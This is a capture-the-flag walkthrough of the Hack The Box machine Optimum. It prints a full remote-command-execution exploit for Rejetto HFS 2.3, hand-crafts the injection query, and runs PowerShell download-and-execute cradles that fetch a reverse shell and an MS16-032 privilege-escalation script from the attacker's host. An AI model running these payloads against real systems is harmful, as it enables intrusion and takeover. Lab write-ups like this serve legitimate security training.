Target IP: 10.10.10.8
Initial nmap scan of all ports, keeping only the open port numbers as a comma-separated list:
nmap -p- --min-rate 10000 10.10.10.8 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','
Only one port comes back open on the target: 80/tcp.
Let's run a more in-depth scan (default scripts and version detection) against that port:
sudo nmap -sCV -p80 10.10.10.8 -oA nmap_results
Results
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Looks like we have a file server (Rejetto HFS 2.3) up and running on the target. Let's check it out.
Using searchsploit, we can see this particular version is likely vulnerable to RCE, and that several different exploits exist for this specific version of Rejetto HFS.
Once we bring down the following exploit
searchsploit -m windows/webapps/49125.py
and print it out, we can see the following:
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
    http = urllib3.PoolManager()
    # The literal %00 stays in the URL; only the command is percent-encoded
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
    print(url)
    response = http.request('GET', url)
except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
    print(ex)
Given a command, the exploit URL-encodes it (urllib.parse.quote) and places it inside an HFS {.exec|...} macro in the search query parameter, prefixed with a %00 null byte so that HFS fails to strip the macro before evaluating it. We can send that same request ourselves without the exploit script.
To test this we will run tcpdump on our machine and have the target ping us.
Running tcpdump on our local machine, listening for ICMP from the target:
Let's use the target machine to ping us.
We can see ICMP traffic generated from the IP 10.10.10.8 within tcpdump, which confirms we have command execution.
Now all that's left is to gain a reverse shell on the target.
Let's utilise a PowerShell script: copy the nishang Invoke-PowerShellTcp shell into our current working directory
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./
and modify it slightly so that it runs as soon as it has been fetched by the target: we append a call to the Invoke-PowerShellTcp function at the bottom of the script, pointing it back at our local machine and listening port.
Now that our payload is ready, let's serve it, start a listener, and have the target fetch and run it.
python3 -m http.server 80
rlwrap -cAr nc -lvnp 9001
Let's craft our command to fetch the script and run it; for ease we will use Burp's Repeater, sending the following as the query string:
search=%00{.exec|c%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.28/Invoke-PowerShellTcp.ps1').}
Notice that our payload is URL encoded (spaces as +, colons as %3a) and that we specified the full path to powershell.exe through SysNative: HFS runs as a 32-bit process, so for it C:\Windows\System32 is redirected to SysWOW64, while SysNative resolves to the real 64-bit System32 and gives us a 64-bit PowerShell.
Now we have a shell on the system.
Let's grab information on the system with systeminfo and see if we can find any privilege escalation exploits.
Results
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 3/1/2024, 11:04:07 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.471 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.923 MB
Virtual Memory: In Use: 580 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Let's utilise wes-ng (Windows Exploit Suggester - Next Generation) to find any missing patches that may have public exploits.
First let's update its definitions:
sudo /opt/wesng/wes.py --update
Now let's save the systeminfo output above into a text file and run wes against it:
sudo /opt/wesng/wes.py systeminfo > possible_exploits
This produces a list of possible exploits on the system. wes-ng reasons only from the installed hotfix list, so expect false positives and confirm candidates before relying on them.
We could also utilise Sherlock.ps1 from rasta-mouse, which checks the versions of specific system files rather than the KB list.
Let's download Sherlock.ps1 onto the target machine.
We want to make a slight modification to the script, as we just want to find vulnerabilities on the machine: we add a call at the bottom of the script so that all checks run as soon as it is loaded.
Start a python3 http server:
python3 -m http.server 80
Within our shell, let's download it onto the target machine:
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.28:80/Sherlock.ps1')
We can see we now have Sherlock's output.
Results
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
From the results, the machine appears vulnerable to
MS16-135, MS16-034, MS16-032
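As an added example (not wes-ng's or Sherlock's code), here is a miniature of what both tools do with the systeminfo output: parse the OS version, architecture and installed hotfix list, then check each bulletin in a table for its fixing KB and report the same three statuses Sherlock prints above. The sample text is a trimmed copy of the systeminfo output shown earlier; the patch table is an assumption for illustration, where MS16-032 -> KB3139914 is the Windows Server 2012 R2 entry from that bulletin and should be verified before use, and the EXAMPLE-* rows are made up to exercise the patched and 32-bit-only branches.

```python
"""
Minimal wes-ng/Sherlock-style check over systeminfo output.

Added example for this writeup, not code from wes-ng or Sherlock. The KB
table is an assumption: MS16-032 -> KB3139914 is taken from the bulletin for
Server 2012 R2 (verify it), the EXAMPLE-* rows are constructed.
"""
import re
import sys

# Constructed sample: trimmed from the writeup's systeminfo output.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2919355
                           [03]: KB3000850
                           [04]: KB3003057
                           [05]: KB3014442
Network Card(s):           1 NIC(s) Installed.
"""

KB_RE = re.compile(r"\bKB\d{6,7}\b")

# bulletin -> fixing KB on this OS, and whether a public exploit works on x64
PATCH_TABLE = {
    "MS16-032": {"kb": "KB3139914", "x64_exploit": True},          # assumed; verify
    "EXAMPLE-PATCHED": {"kb": "KB3014442", "x64_exploit": True},   # constructed: KB present
    "EXAMPLE-X86-ONLY": {"kb": "KB0000000", "x64_exploit": False}, # constructed
}


def load_systeminfo(path):
    """Read a saved systeminfo file; a redirect from a Windows shell is often UTF-16LE."""
    data = open(path, "rb").read()
    if data[:2] == b"\xff\xfe":
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def parse_systeminfo(text):
    """Pull OS name/version, architecture and the installed KB set out of systeminfo text."""
    info = {"os_name": None, "os_version": None, "x64": None, "hotfixes": set()}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            info["os_version"] = value.split()[0]      # "6.3.9600"
        elif key == "System Type":
            info["x64"] = value.startswith("x64")
        # hotfix lines look like "[01]: KB2959936"; grab every KB token on any line
        info["hotfixes"].update(KB_RE.findall(line))
    return info


def assess(info, table=PATCH_TABLE):
    """Sherlock's three statuses, decided from the KB list alone (not file versions)."""
    results = {}
    for bulletin, entry in table.items():
        if entry["kb"] in info["hotfixes"]:
            results[bulletin] = "Not Vulnerable"
        elif info["x64"] and not entry["x64_exploit"]:
            results[bulletin] = "Not supported on 64-bit systems"
        else:
            results[bulletin] = "Appears Vulnerable"
    return results


if __name__ == "__main__":
    text = load_systeminfo(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SYSTEMINFO
    info = parse_systeminfo(text)
    arch = "x64" if info["x64"] else "x86"
    print(f"{info['os_name']} {info['os_version']} ({arch}), {len(info['hotfixes'])} hotfixes")
    for bulletin, status in assess(info).items():
        print(f"{bulletin:18} {status}")
```

Point it at the saved systeminfo file (python3 kbcheck.py systeminfo) or run it with no argument to use the embedded sample. Because it only looks at KBs, a bulletin whose fix arrived in a later cumulative update would still show as vulnerable; that is the false-positive class wes-ng warns about, and the reason Sherlock inspects file versions instead.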
We can utilise MS16-032 via the PowerShell script that ships with Empire.
Clone Empire; within data/module_source/privesc we can see Invoke-MS16032.ps1.
Let's copy the PowerShell script to our working directory:
sudo cp Invoke-MS16032.ps1 ~/Desktop/HTB/windows/optimum/exploits
Let's slightly modify the script so that it runs once downloaded, with a command that picks up our nishang shell again, this time modified to connect back to port 9010.
rlwrap -cAr nc -lvnp 9010
Start a python3 http server:
python3 -m http.server 9005
Download and run on the target (note that this cradle fetches from port 80, so the URL and the http server you actually have listening must agree on the port):
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.28:80/Invoke-MS16032.ps1')
When we check our other shell we should see we are nt authority\system.